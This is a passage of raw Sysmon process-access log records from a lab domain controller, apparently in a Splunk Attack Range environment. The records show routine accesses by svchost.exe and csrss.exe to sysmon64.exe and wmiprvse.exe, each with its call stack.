Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002092Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.518{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-647E-6064-4400-00000000AE01}3944C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002091Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.518{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647E-6064-4400-00000000AE01}3944C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002090Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.487{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002089Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.487{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002088Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.487{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002087Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.487{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002086Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.487{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002085Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.487{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002084Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.487{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002083Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.487{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002082Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.487{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002081Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.471{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002080Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.471{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002079Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.471{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002078Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.471{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002077Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.471{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002076Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.471{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002075Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.471{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002074Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.471{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002073Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.471{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002072Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002071Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002070Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002069Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002068Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
